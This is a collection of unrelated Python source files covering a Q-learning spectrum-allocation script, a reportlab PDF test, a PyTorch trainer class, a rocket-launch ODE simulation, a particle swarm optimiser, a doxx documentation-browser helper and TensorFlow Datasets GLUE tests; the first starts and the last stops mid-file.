    :param env: the distributed Q-learning environment
    :param params: training schedule (number of episodes, steps)
    :param q_tables: one DistributedQTable per agent, updated in place
    :return: (policies, bag) where policies is the greedy action index per
        state for each table and bag tracks the mean of agent 0's Q-table
        per episode.
    """
    best_reward = -1e9
    env.build_scenario(agents)
    bag = list()
    for episode in range(params.max_episodes):
        # TODO (translated from Portuguese): currently the users are randomly
        # redistributed each episode. Is this the best thing to do? Simulate
        # user displacement instead?
        obs = env.get_state()
        total_reward = 0.0
        for j in range(len(agents)):
            agents[j].get_action(obs, q_tables[j])
        # Renamed from `rewards`: the original local shadowed the imported
        # q_learning.rewards module.
        next_obs, step_rewards, _ = env.step(agents)
        for m in range(len(agents)):
            q_tables[m].learn(obs, agents[m].action_index, step_rewards[m], next_obs)
        obs = next_obs
        total_reward += sum(step_rewards)
        if total_reward > best_reward:
            best_reward = total_reward
        bag.append(q_tables[0].table.mean())
        print("Episode#:{} sum reward:{} best_sum_reward:{} eps:{}".format(episode,
            total_reward, best_reward, agents[0].epsilon))
    # Return the trained policy
    policies = [np.argmax(q.table, axis=1) for q in q_tables]
    return policies, bag
def test(agents: List[Agent], env: DistributedEnvironment, policies, iterations: int):
    """Run the greedy learned *policies* on *env* for up to *iterations* steps.

    :param agents: one Agent per D2D transmitter
    :param env: environment to evaluate on (spectral-efficiency logs reset here)
    :param policies: per-agent arrays mapping state -> greedy action index
    :param iterations: hard cap on the number of environment steps
    :return: the accumulated sum of all agents' rewards
    """
    # env.build_scenario(agents)
    env.mue_spectral_eff = list()
    env.d2d_spectral_eff = list()
    done = False
    obs = env.get_state()
    total_reward = 0.0
    i = 0
    while not done:
        action_indexes = [policy[obs] for policy in policies]
        for j in range(len(agents)):
            agents[j].set_action(action_indexes[j])
        # Renamed from `rewards`: the original local shadowed the imported
        # q_learning.rewards module.
        next_obs, step_rewards, done = env.step(agents)
        obs = next_obs
        total_reward += sum(step_rewards)
        i += 1
        if i >= iterations:
            break
    return total_reward
# SCRIPT EXEC
# training
learned_policies, avg_q_values = train(agents, environment, train_params, q_tables)
# Base name of this script (no extension), used to label saved artifacts.
filename = gen.path_leaf(__file__)
filename = filename.split('.')[0]
np.save(f'{lucas_path}/models/{filename}', learned_policies)
# testing
# t_env = DistributedEnvironment(env_params, reward_function)
# t_agents = [Agent(agent_params, actions) for i in range(n_d2d)] # 1 agent per d2d tx
t_env = copy.copy(environment)
for i in range(50):
    total_reward = test(agents, t_env, learned_policies, 20)
    print(f'TEST #{i} REWARD: {total_reward}')
# Fraction of test steps where the MUE metric cleared the (linear) threshold.
success_rate = np.mean(np.array(t_env.mue_spectral_eff) > sinr_threshold)
log = list()
log.append(f'D2D SPECTRAL EFFICIENCY: {np.array(t_env.d2d_spectral_eff).mean()}')
log.append(f'MUE SUCCESS RATE: {success_rate}')
filename = f'{lucas_path}/logs/{filename}.txt'
with open(filename, 'w') as log_file:
    for line in log:
        # BUGFIX: terminate each entry with a newline; the original wrote all
        # entries concatenated onto a single line.
        log_file.write(line + '\n')
plot_spectral_effs(environment)
plot_spectral_effs(t_env)
plt.figure()
plt.plot(avg_q_values)
plt.xlabel('Iteration')
plt.ylabel('Average Q-Values')
plt.show()
print('SUCCESS')
|
<filename>tests/test_pdf.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <<EMAIL>>
# Date: 2019-05-07
# Desc:
import io
from reportlab.lib.units import inch
from reportlab.lib.units import mm
from reportlab.pdfgen import canvas
from reportlab.lib.colors import white
def mm_to_dpi(mm):
    """Convert a length in millimetres to PDF points (72 per inch).

    NOTE(review): the parameter name shadows reportlab's imported ``mm``
    unit; kept unchanged for interface compatibility.

    :param mm: length in millimetres
    :return: the equivalent number of points
    """
    cm = mm * 0.1
    # Renamed from `inch`: the original local shadowed reportlab's imported
    # `inch` unit constant.
    inches = cm / 2.54  # 1 in = 2.54 cm
    return 72 * inches
def some_view():
    """Draw a handful of test shapes onto a large landscape PDF page."""
    # In-memory buffer that receives the generated PDF bytes.
    buf = io.BytesIO()
    # Page size given directly in millimetres via reportlab's mm unit.
    pdf = canvas.Canvas(buf, pagesize=(1520 * mm, 300 * mm))
    # Disable stream compression so the PDF source stays human-readable.
    pdf.setPageCompression(0)
    pdf._filename = "demo.pdf"
    # pdf.setAuthor("ZhengXiang")
    pdf.bezier(0 * mm, 200 * mm, 50 * mm, 190 * mm, 10 * mm, 250 * mm, 180 * mm, 300 * mm)
    pdf.circle(100 * mm, 100 * mm, 18 * mm)
    pdf.circle(100 * mm, 100 * mm, 10 * mm)
    pdf.circle(100 * mm, 100 * mm, 0.5 * mm)
    pdf.line(0 * mm, 200 * mm, 1520 * mm, 200 * mm)
    pdf.beginPath()
    # Finish the page and serialise the document into the buffer.
    pdf.showPage()
    pdf.save()
def penciltip(canvas, debug=1):
    """Draw a guide line onto *canvas* and save the document.

    :param canvas: a reportlab Canvas to draw on (the parameter shadows the
        imported ``canvas`` module; kept for interface compatibility)
    :param debug: when truthy, scale the drawing up 2.8x and use thin lines
    """
    canvas.setLineWidth(4)
    # Disable compression so the PDF content stream stays readable.
    canvas.setPageCompression(0)
    canvas._filename = "demo.pdf"
    if debug:
        canvas.scale(2.8, 2.8)  # make it big
        canvas.setLineWidth(1)  # small lines
        # canvas.setDash(10, 3)
        # canvas.setStrokeAlpha(0.3)
        # canvas.setLineWidth(0.5)
    # dashed guide line (translated from Chinese comment)
    canvas.line(0, 150 * mm, 1520 * mm, 150 * mm)
    # canvas.line(180 * mm, 0 * mm, 180 * mm, 300 * mm)
    # canvas.line(760 * mm, 0 * mm, 760 * mm, 300 * mm)
    # canvas.line(1340 * mm, 0 * mm, 1340 * mm, 300 * mm)
    #
    # path = canvas.beginPath()
    # path.moveTo(0 * mm, 150 * mm)
    # path.lineTo(180*mm, 300 * mm)
    # path.lineTo(760 * mm, 290 * mm)
    # path.lineTo(1340 * mm, 300 * mm)
    # path.lineTo(1520 * mm, 150 * mm)
    # path.lineTo(1340 * mm, 0 * mm)
    # path.lineTo(760 * mm, 10 * mm)
    # path.lineTo(180 * mm, 0 * mm)
    # path.close()
    #
    # canvas.setDash()
    # canvas.setStrokeAlpha(1)
    # canvas.setLineWidth(1)
    # canvas.drawPath(path, stroke=1, fill=0)
    # Emit the page and write the finished PDF.
    canvas.showPage()
    canvas.save()
if __name__ == "__main__":
    # some_view()
    buffer = io.BytesIO()
    # Create the PDF object, using the buffer as its "file."
    # Bound to a new name: the original rebound the imported `canvas` module
    # name to a Canvas instance, shadowing the module for the rest of main.
    c = canvas.Canvas(buffer, pagesize=(1520 * mm, 300 * mm))
    penciltip(c, debug=0)
|
<filename>ever/api/trainer/trainer.py<gh_stars>0
import argparse
import torch
import shutil
import os
from ever.core import config
from ever.core.builder import make_dataloader
from ever.core.builder import make_learningrate
from ever.core.builder import make_model
from ever.core.builder import make_optimizer
from ever.core.launcher import Launcher
from ever.util import param_util
__all__ = ['merge_dict', 'Trainer', 'half_bn']
def merge_dict(dict1: dict, dict2: dict):
    """Merge two dicts into a new mapping, refusing any overlapping keys.

    Raises ValueError if the inputs share keys.  When *dict1* is a
    config.AttrDict the merged result is returned as an AttrDict too.
    """
    # check whether redundant key
    duplicates = [key for key in dict1 if key in dict2]
    if duplicates:
        raise ValueError('Duplicate keys: {}'.format(duplicates))
    combined = dict1.copy()
    combined.update(dict2)
    if isinstance(dict1, config.AttrDict):
        return config.AttrDict.from_dict(combined)
    return combined
def half_bn(m):
    """Convert *m* to half precision iff its class name marks it as a batch-norm layer."""
    if 'BatchNorm' in type(m).__name__:
        m.half()
class Trainer(object):
    """Command-line training driver: parses args, loads config, builds the
    model/dataloaders/optimizer and hands them to a Launcher."""
    def __init__(self):
        # Lazily-populated caches for parsed args and loaded config.
        self._args = None
        self._cfg = None
        self.parser = argparse.ArgumentParser()
        self.parser.add_argument("--local_rank", type=int)
        self.parser.add_argument('--config_path', default=None, type=str,
                                 help='path to config file')
        self.parser.add_argument('--model_dir', default=None, type=str,
                                 help='path to model directory')
        self.parser.add_argument(
            "opts",
            help="Modify config options using the command-line",
            default=None,
            nargs=argparse.REMAINDER,
        )
    @property
    def device(self):
        """torch.device('cuda') when CUDA is available, else CPU."""
        return torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
    @property
    def args(self):
        """Parse CLI args once; also snapshots the config file into model_dir.

        Side effects on first access: creates model_dir and copies the config
        (either a direct .py path, or a dotted path resolved under ./configs)
        to <model_dir>/config.py.
        """
        if self._args:
            return self._args
        self._args = self.parser.parse_args()
        assert self._args.config_path is not None, 'The `config_path` is needed'
        assert self._args.model_dir is not None, 'The `model_dir` is needed'
        os.makedirs(self._args.model_dir, exist_ok=True)
        if self._args.config_path.endswith('.py'):
            shutil.copy(self._args.config_path, os.path.join(self._args.model_dir, 'config.py'))
        else:
            # Dotted form, e.g. "seg.fcn" -> ./configs/seg/fcn.py
            cfg_path_segs = ['configs'] + self._args.config_path.split('.')
            cfg_path_segs[-1] = cfg_path_segs[-1] + '.py'
            shutil.copy(os.path.join(os.path.curdir, *cfg_path_segs), os.path.join(self._args.model_dir, 'config.py'))
        return self._args
    @property
    def config(self):
        """Load and cache the config referenced by --config_path as an AttrDict."""
        if self._cfg:
            return self._cfg
        cfg = config.import_config(self.args.config_path)
        self._cfg = config.AttrDict.from_dict(cfg)
        return self._cfg
    def make_model(self):
        """Build the model, after applying any command-line `opts` overrides."""
        if self.args.opts:
            self.config.update_from_list(self.args.opts)
        model = make_model(self.config.model)
        return model
    def make_dataloader(self):
        """Build the train dataloader, and the test one if configured."""
        traindata_loader = make_dataloader(self.config.data.train)
        testdata_loader = make_dataloader(self.config.data.test) if 'test' in self.config.data else None
        return dict(traindata_loader=traindata_loader, testdata_loader=testdata_loader)
    def make_lr_optimizer(self, params):
        """Build the LR schedule and an optimizer over *params*.

        The optimizer's initial lr is taken from the schedule's base_lr.
        """
        lr_schedule = make_learningrate(self.config.learning_rate)
        self.config.optimizer.params['lr'] = lr_schedule.base_lr
        optimizer = make_optimizer(self.config.optimizer, params=params)
        return dict(lr_schedule=lr_schedule, optimizer=optimizer)
    def run(self, after_construct_launcher_callbacks=None):
        """Full training entry point; returns the config and the Launcher used."""
        tl = self.build_launcher()['launcher']
        kw_dataloader = self.make_dataloader()
        param_util.trainable_parameters(tl.model, tl.logger)
        param_util.count_model_parameters(tl.model, tl.logger)
        if after_construct_launcher_callbacks is not None:
            for f in after_construct_launcher_callbacks:
                f(tl)
        tl.logger.info('external parameter: {}'.format(self.args.opts))
        tl.train_by_config(kw_dataloader['traindata_loader'], config=merge_dict(self.config.train, self.config.test),
                           test_data_loader=kw_dataloader['testdata_loader'])
        return dict(config=self.config, launcher=tl)
    def evaluate(self, test_config=None, after_construct_launcher_callbacks=None):
        """Evaluation entry point; *test_config* (dict or AttrDict) overrides
        the configured test dataloader when given."""
        tl = self.build_launcher()['launcher']
        param_util.trainable_parameters(tl.model, tl.logger)
        param_util.count_model_parameters(tl.model, tl.logger)
        if test_config:
            if isinstance(test_config, config.AttrDict):
                pass
            elif isinstance(test_config, dict):
                test_config = config.AttrDict.from_dict(test_config)
            else:
                raise ValueError()
            dataloader = make_dataloader(test_config)
        else:
            dataloader = make_dataloader(self.config.data.test)
        if after_construct_launcher_callbacks is not None:
            for f in after_construct_launcher_callbacks:
                f(tl)
        tl.evaluate(dataloader, merge_dict(self.config.train, self.config.test))
        return dict(config=self.config, launcher=tl)
    def build_launcher(self):
        """Assemble model (moved to self.device), LR schedule and optimizer
        into a Launcher."""
        kwargs = dict(model_dir=self.args.model_dir)
        kwargs.update(dict(model=self.make_model().to(self.device)))
        kwargs.update(self.make_lr_optimizer(kwargs['model'].parameters()))
        tl = Launcher(**kwargs)
        return dict(config=self.config, launcher=tl)
|
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
# Constants
# Physical constants and vehicle parameters for a two-stage launch
# (values resemble a Falcon 9-class vehicle -- see the reference string at
# the bottom of the file).
G = 6.67408 * 10 ** -11  # m^3 kg^-1 s^-2
M_Earth = 5.972 * 10 ** 24  # kg
# print(G * M_Earth)
R = 6378.137  # km (Earth equatorial radius)
g = (G * M_Earth) / ((R * 1000) ** 2)  # m s^-2 (surface gravity)
# print(g)
m_stage_1 = 422000  # kg (stage 1 total mass, incl. propellant)
m_s_1_propellant = 370000  # kg
m_dot_s_1 = 2312.5  # kg/s (stage 1 propellant mass flow)
ve_s_1 = 2943  # m/s (stage 1 effective exhaust velocity)
t_burn_s_1 = 162  # s
m_stage_2 = 128000  # kg
m_s_2_propellant = 108000  # kg
m_dot_s_2 = 270  # kg/s
ve_s_2 = 3433.5  # m/s
t_burn_s_2 = 397  # s
t_coast = 1000  # s (unpowered coast duration after stage 2)
def stage_1(state_var_launch, t):
    """ODE right-hand side during the first-stage burn.

    :param state_var_launch: [h, v] -- h appears to be radial distance in km
        and v in km/s (see the launch state [6378.1, 0.0] below); confirm.
    :param t: time since liftoff in s
    :return: [dh/dt, dv/dt]
    """
    h, v = state_var_launch
    thrust = m_dot_s_1 * ve_s_1
    M = m_stage_1 + m_stage_2  # full-stack initial mass
    m = t * m_dot_s_1  # propellant burned so far
    thrust_acc = thrust / (M - m) / 1000
    # BUGFIX: the original multiplied gravity by np.sin(90) -- the sine of 90
    # *radians* (~0.894) -- where sin(90 degrees) == 1.0 was clearly intended
    # for a vertical ascent.  The exact factor 1.0 is used here.
    g = - (G * M_Earth) / ((h * 1000) ** 2) / 1000
    dvdt = thrust_acc + g  # - (.3 * 0.25 * 200) / (M - m)
    return [v, dvdt]
def stage_2(state_var_s_2_ignition, t):
    """ODE right-hand side during the second-stage burn.

    :param state_var_s_2_ignition: [h, v] -- h in km, v in km/s (as handed
        over from the stage-1 integration)
    :param t: absolute time since liftoff in s
    :return: [dh/dt, dv/dt]
    """
    h, v = state_var_s_2_ignition
    thrust = m_dot_s_2 * ve_s_2
    M = m_stage_2
    # NOTE(review): t_burn_s_1 is declared as 162 s above, but the stage-2
    # clock offset used here is 160 -- confirm which value is intended.
    m = (t - 160) * m_dot_s_2
    thrust_acc = thrust / (M - m) / 1000
    g = - (G * M_Earth) / ((h * 1000) ** 2) / 1000
    dvdt = thrust_acc + g  # - (.3 * 0.25 * 200) / (M - m)
    return [v, dvdt]
def coast_traj(state_var_c_dragon_separation, t):
    """Unpowered coast: gravity is the only acceleration acting on the craft.

    :param state_var_c_dragon_separation: [h, v] -- h in km, v in km/s
    :param t: time in s (unused; gravity depends only on altitude)
    :return: [dh/dt, dv/dt]
    """
    h, v = state_var_c_dragon_separation
    grav_acc = -(G * M_Earth) / ((h * 1000) ** 2) / 1000
    # Drag term intentionally omitted: # - (.3 * 0.25 * 200) / (M - m)
    return [v, grav_acc]
# Launch
# NOTE(review): h is initialised to Earth's radius in km while the comment
# says [km, m/s]; the velocity unit looks like km/s given the /1000 scaling
# in the ODEs -- confirm.
state_var_launch = [6378.1, 0.0]  # [km, m/s]
t_s_1 = np.linspace(0, t_burn_s_1)
# NOTE(review): this rebinds the name `stage_1` from the ODE function to its
# solution array (likewise `stage_2` and `coast_traj` below); it works because
# each function is only integrated once, but is fragile.
stage_1 = odeint(stage_1, state_var_launch, t_s_1)
h_stage_1, v_stage_1 = stage_1.T
print(h_stage_1)
# Stage 2 Ignition: continue from the final stage-1 state.
state_var_s_2_ignition = [h_stage_1[-1], v_stage_1[-1]]
t_s_2 = np.linspace(t_s_1[-1], t_s_1[-1] + t_burn_s_2)
stage_2 = odeint(stage_2, state_var_s_2_ignition, t_s_2)
h_stage_2, v_stage_2 = stage_2.T
print(h_stage_2)
# Crew Dragon Separation & ISS Approach: ballistic coast from stage-2 cutoff.
state_var_c_dragon_separation = [h_stage_2[-1], v_stage_2[-1]]
t_coast_traj = np.linspace(t_s_2[-1], t_s_2[-1] + t_coast)
coast_traj = odeint(coast_traj, state_var_c_dragon_separation, t_coast_traj)
h_coast_traj, v_coast_traj = coast_traj.T
print(h_coast_traj)
plt.figure()
# Altitude(t) -- plotted as height above the surface (radial distance minus R)
plt.subplot(3, 1, 1)
plt.plot(t_s_1, h_stage_1 - R)
plt.plot(t_s_2, h_stage_2 - R)
plt.plot(t_coast_traj, h_coast_traj - R)
plt.xlabel('time')
plt.ylabel('h(t)')
# Velocity(t) -- scaled by 3600 (presumably per-hour units; confirm)
plt.subplot(3, 1, 2)
plt.plot(t_s_1, v_stage_1 * 3600)
plt.plot(t_s_2, v_stage_2 * 3600)
plt.plot(t_coast_traj, v_coast_traj * 3600)
plt.xlabel('time')
plt.ylabel('v(t)')
# Mass(t) -- dry mass plus remaining propellant per phase
plt.subplot(3, 1, 3)
plt.plot(t_s_1, 52000 + (m_s_1_propellant - t_s_1 * m_dot_s_1))
plt.plot(t_s_2, 20000 + m_s_2_propellant - (t_s_2 - 160) * m_dot_s_2)
plt.plot(t_coast_traj, 20000 + t_coast_traj * 0)
plt.xlabel('time')
plt.ylabel('m(t)')
plt.show()
'''
Falcon 9 v1.2 Full Thrust
Stage 1
- Thrust(Sea Level): 7,607 kN
- Thrust(Vacuum): 8,227 kN
- Specific Impulse: 282 s
- Dry Mass: 25,600 kg
- Propellant Mass: 395,700 kg
- Initial Mass: 421,300 kg
- Final Mass: 25,600 kg
- ISP = Ve / g
- Ve = ISP · g
- Ve = 282 · 9.807 = 2,765.574 m/s = 2.765574 km/s
Falcon9 v1.2 Stage 1 (7.75, 16.46)
- ∆V Stage 1 = 7.75 km/s = 27,900 km/h = 17,336.256 m/h
- Mass Ratio = 16.46
Stage 2
- Thrust: 934 kN
- Specific Impulse: 348 s
- Dry Mass: 3, 900 kg
- Propellant Mass: 92, 670 kg
- Initial Mass: 96, 570 kg
- Final Mass: 3, 900 kg
- ISP = Ve / g
- Ve = ISP · g
- Ve = 348 · 9.807 = 3, 412.836 m/s = 3.412836 km/s
Falcon9 v1.2 Stage 2 (10.95, 24.76)
- ∆V Stage 2 = 10.95 km/s = 39, 420 km/h = 24, 494.452 m/h
- Mass Ratio = 24.76
'''
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 28 10:20:57 2019
@author: zmddzf
"""
import numpy as np
import matplotlib.pyplot as plt
import numpy.linalg as la
class Birds:
    """
    Flock container: holds the particle swarm's state arrays for PSO.
    (Docstrings translated from Chinese.)
    """
    def __init__(self, popsize, dim):
        """
        Flock constructor; initialises a flock instance.
        :param popsize: number of particles
        :param dim: problem dimensionality
        :param indiv_best: per-particle best fitness
        :param group_best: swarm-wide best fitness
        :param position: placeholder, particle positions
        :param v_mat: placeholder, particle velocities
        :param best_position: placeholder, best position found
        """
        self.popsize = popsize
        self.dim = dim
        self.indiv_best = np.array([-1e10 for i in range(popsize)])
        self.group_best = -1e10
        self.position = None
        self.v_mat = None
        self.best_position = None
        # NOTE(review): "posion" is a typo for "position", but the attribute
        # is read by PSO.update(), so the name must stay as-is.
        self.best_indiv_posion = None
    def init_poplation(self, v_max, x_bound):
        """
        Randomly initialise the flock's positions and velocities.
        :param v_max: maximum velocity
        :param x_bound: position bounds, x_bound = [max=[],min=[]]
        """
        self.v_mat = np.random.uniform(0, v_max, (self.popsize, self.dim))
        self.position = np.random.uniform(x_bound[0],x_bound[1],(self.popsize, self.dim))
        self.best_indiv_posion = self.position.copy()
    def select_best(self, fitness_values):
        """
        Update the best fitnesses and positions.
        :param fitness_values: per-particle fitness vector
        """
        # Where the new fitness beats a particle's previous best, adopt the
        # new position and fitness (the two boolean masks are identical).
        #print('fitness:', fitness_values)
        #print('preindiv:', self.indiv_best)
        self.best_indiv_posion[self.indiv_best < fitness_values] = self.position[fitness_values > self.indiv_best]
        self.indiv_best[self.indiv_best < fitness_values] = fitness_values[fitness_values > self.indiv_best]
        # Largest fitness seen by any particle so far
        self.group_best = max(self.indiv_best)
        # Position corresponding to that largest fitness
        self.best_position = self.best_indiv_posion[self.indiv_best.argmax()]
class PSO:
    """
    Particle Swarm Optimisation driver operating on a Birds flock.
    (Docstrings translated from Chinese.)
    """
    def __init__(self, w, c1, c2, popsize, dim, x_bound, v_max, fitness_func):
        """
        PSO constructor.
        :param w: inertia weight
        :param c1: cognitive (self-experience) acceleration constant
        :param c2: social (swarm-experience) acceleration constant
        :param popsize: number of particles
        :param dim: problem dimensionality
        :param v_max: maximum velocity
        :param x_bound: position bounds, x_bound = [max=[],min=[]]
        :param fitness_fuc: fitness function; must support vectorised input
        """
        self.w = w
        self.c1 = c1
        self.c2 = c2
        self.v_max = v_max
        self.popsize = popsize
        self.dim = dim
        self.x_bound = x_bound
        self.fitness_func = fitness_func
        self.birds = Birds(self.popsize, self.dim)
    def compute_fitness(self, X):
        """
        Compute the swarm's fitness.
        :param X: row vectors; each row is one particle's position
        :return fitness_values: fitness vector of shape (popsize,)
        """
        fitness_values = self.fitness_func(X)
        fitness_values = fitness_values.reshape(self.popsize)
        return fitness_values
    def update(self):
        """
        Update positions and velocities (standard PSO velocity rule, with
        velocities and positions clipped to their bounds).
        """
        self.birds.v_mat = self.w * self.birds.v_mat + self.c1 * np.random.rand() * (self.birds.best_indiv_posion - self.birds.position) + self.c2 * np.random.rand() * (self.birds.best_position - self.birds.position)
        self.birds.v_mat[self.birds.v_mat>self.v_max] = self.v_max
        self.birds.position = self.birds.position + self.birds.v_mat
        # Clamp every coordinate back inside its [min, max] bound.
        for i in range(len(self.x_bound[0])):
            self.birds.position[:,i][self.birds.position[:,i] < self.x_bound[0][i]] = self.x_bound[0][i]
            self.birds.position[:,i][self.birds.position[:,i] > self.x_bound[1][i]] = self.x_bound[1][i]
        #print('postposition:')
        #print(self.birds.position)
    def run(self, iter_n):
        """Run *iter_n* iterations; returns (birds, fitness history,
        position history, text log)."""
        # Initialise the flock.
        # NOTE(review): this first `s_` is dead -- it is overwritten below.
        s_ = 'generation 0\nbest fitness_value:%f'%self.birds.group_best
        self.birds.init_poplation(self.v_max, self.x_bound)
        fitness_values = self.compute_fitness(self.birds.position)
        self.birds.select_best(fitness_values)
        position_list = self.birds.position
        diff_p = []
        best_fitness_hist = []
        best_position_hist = []
        s_ = ''
        for i in range(iter_n):
            s1 = 'generation %d \nbest fitness_value:%f'%(i, self.birds.group_best)
            # Linearly decay the inertia weight over iterations.
            w = 1 - i*0.0099999
            self.w = w
            self.update()
            position_list = np.hstack([position_list, self.birds.position])
            fitness_values = self.compute_fitness(self.birds.position)
            self.birds.select_best(fitness_values)
            best_fitness_hist.append(self.birds.group_best)
            best_position_hist.append(self.birds.best_position)
            s2 = 'group best:'+str(self.birds.group_best)
            s3 = 'best position:'+str(self.birds.best_position)
            s = '\n'+s1+'\n'+s2+'\n'+s3
            s_ = s_ + s
        # NOTE(review): ndarray.reshape returns a new array and the result is
        # discarded here, so this call has no effect.
        position_list.reshape(self.popsize, iter_n+1, self.dim)
        return self.birds, best_fitness_hist, best_position_hist, s_
def func(x):
    """
    Objective function (translated from Chinese).
    :param x: input value or numpy array
    :return y: x + 10*sin(5x) + 7*cos(4x)
    """
    sine_term = 10 * np.sin(5 * x)
    cosine_term = 7 * np.cos(4 * x)
    return x + sine_term + cosine_term
def sigmoid(x):
    """Logistic sigmoid: 1 / (1 + e^-x); accepts scalars or numpy arrays."""
    return 1.0 / (1.0 + np.e ** (-x))
|
<reponame>joesantana/doxx<gh_stars>0
#!/usr/bin/env python
# encoding: utf-8
import webbrowser
from Naked.toolshed.system import stderr, stdout
# Mapping of query term -> documentation URL opened by browse_docs().
docs_dict = {
    "docs": "http://doxx.org",
    "blog": "http://things.doxx.org",
    "updates": "https://twitter.com/doxxapp",
    "source": "https://github.com/chrissimpkins/doxx",
    "pr": "https://github.com/doxx-repo",
    "browse": "http://doxx.org/commands/browse/",
    "build": "http://doxx.org/commands/build/",
    "clean": "http://doxx.org/commands/clean/",
    "make": "http://doxx.org/commands/make/",
    "pack": "http://doxx.org/commands/pack/",
    "pull": "http://doxx.org/commands/pull/",
    "pullkey": "http://doxx.org/commands/pullkey/",
    "search": "http://doxx.org/commands/search/",
    "unpack": "http://doxx.org/commands/unpack/",
    "whatis": "http://doxx.org/commands/whatis/",
    "syntax": "http://doxx.org/usage/syntax/",
    "template": "http://doxx.org/usage/templates/",
    "key": "http://doxx.org/usage/keys/",
    "archive": "http://doxx.org/usage/archives/",
    "changes": "http://doxx.org/more/changelog/"
}
# Human-readable description of each query term, echoed to stdout when the
# corresponding page is opened.  Keys mirror docs_dict.
docs_message_dict = {
    "docs": "doxx main documentation page",
    "blog": "doxx blog",
    "updates": "doxx Twitter updates feed",
    "source": "doxx Github repository",
    "pr": "doxx Package Repository",
    "browse": "browse command documentation",
    "build": "build command documentation",
    "clean": "clean command documentation",
    "make": "make command documentation",
    "pack": "pack command documentation",
    "pull": "pull command documentation",
    "pullkey": "pullkey command documentation",
    "search": "search command documentation",
    "unpack": "unpack command documentation",
    "whatis": "whatis command documentation",
    "syntax": "syntax documentation",
    "template": "template file documentation",
    "key": "key file documentation",
    "archive": "project archive documentation",
    "changes": "doxx changelog"
}
def browse_docs(query):
    """browse doxx documentation and associated websites by query term in default web browser"""
    term = query.lower()
    if term not in docs_dict:
        # Not a canonical term: try matching common synonyms first.
        term = sounds_like(term)
    if term in docs_dict:
        webbrowser.open(docs_dict[term])
        if term in docs_message_dict:
            stdout("[*] doxx: Opening the " + docs_message_dict[term])
    else:
        stderr("[!] doxx: Unable to find a page for your query. The available queries are:", exit=0)
        stderr(" ", exit=0)
        for available_query in sorted(docs_dict.keys()):
            stderr(available_query, exit=0)
def sounds_like(query):
    """Match common query terms to the actual key mapping value in the URL dictionary"""
    synonym_groups = {
        'docs': ['documentation', 'help', 'doxx.org'],
        'blog': ['things', 'tutorials', 'tuts'],
        'updates': ['twitter', 'feed', 'update', 'news', 'whatsnew'],
        'source': ['sourcecode', 'code', 'modules', 'repository'],
        'pr': ['packagerepo', 'package-repo', 'packages'],
        'template': ['templates'],
        'key': ['keys'],
        'archive': ['archives'],
        'changes': ['changelog'],
    }
    for canonical, synonyms in synonym_groups.items():
        if query in synonyms:
            return canonical
    # No synonym matched: return the original query unchanged.
    return query
|
<filename>tensorflow_datasets/text/glue_test.py<gh_stars>1-10
# coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the GLUE data set.
We have an individual test for each config so that we can use sharding to
prevent the test from timing out.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_datasets import testing
from tensorflow_datasets.text import glue
# One DatasetBuilderTestCase subclass per GLUE config, so the suite can be
# sharded (see the module docstring).  SPLITS maps split name -> number of
# examples expected in the fake test data.
class GlueColaTest(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["cola"]
  DATASET_CLASS = glue.Glue
  SPLITS = {
      "train": 3,
      "validation": 2,
      "test": 1,
  }
class GlueSst2Test(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["sst2"]
  DATASET_CLASS = glue.Glue
  SPLITS = {
      "train": 3,
      "validation": 2,
      "test": 1,
  }
class GlueQqpTest(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["qqp"]
  DATASET_CLASS = glue.Glue
  SPLITS = {
      "train": 3,
      "validation": 2,
      "test": 1,
  }
class GlueStsbTest(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["stsb"]
  DATASET_CLASS = glue.Glue
  SPLITS = {
      "train": 3,
      "validation": 2,
      "test": 1,
  }
# MNLI has matched/mismatched variants of its validation and test splits.
class GlueMnliTest(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["mnli"]
  DATASET_CLASS = glue.Glue
  SPLITS = {
      "train": 3,
      "validation_matched": 2,
      "validation_mismatched": 2,
      "test_matched": 1,
      "test_mismatched": 1,
  }
class GlueQnliTest(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["qnli"]
  DATASET_CLASS = glue.Glue
  SPLITS = {
      "train": 3,
      "validation": 2,
      "test": 1,
  }
class GlueRteTest(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["rte"]
  DATASET_CLASS = glue.Glue
  SPLITS = {
      "train": 3,
      "validation": 2,
      "test": 1,
  }
class GlueWnliTest(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["wnli"]
  DATASET_CLASS = glue.Glue
  SPLITS = {
      "train": 3,
      "validation": 2,
      "test": 1,
  }
# MRPC downloads individual files rather than an archive, so the expected
# download/extract mapping is declared explicitly.
class GlueMrpcTest(testing.DatasetBuilderTestCase):
  BUILDER_CONFIG_NAMES_TO_TEST = ["mrpc"]
  DATASET_CLASS = glue.Glue
  DL_EXTRACT_RESULT = {
      "train": "MRPC/msr_paraphrase_train.txt",
      "test": "MRPC/msr_paraphrase_test.txt",
      "dev_ids": "MRPC/mrpc_dev_ids.tsv",
  }
  SPLITS = {
      "train": 10,
      "validation": 8,
      "test": 15,
  }
# "S3" variants re-run each config's test against the experimental_latest
# dataset version; everything else is inherited from the base test case.
class GlueColaS3Test(GlueColaTest):
  VERSION = "experimental_latest"
class GlueSst2S3Test(GlueSst2Test):
  VERSION = "experimental_latest"
class GlueQqpS3Test(GlueQqpTest):
  VERSION = "experimental_latest"
class GlueStsbS3Test(GlueStsbTest):
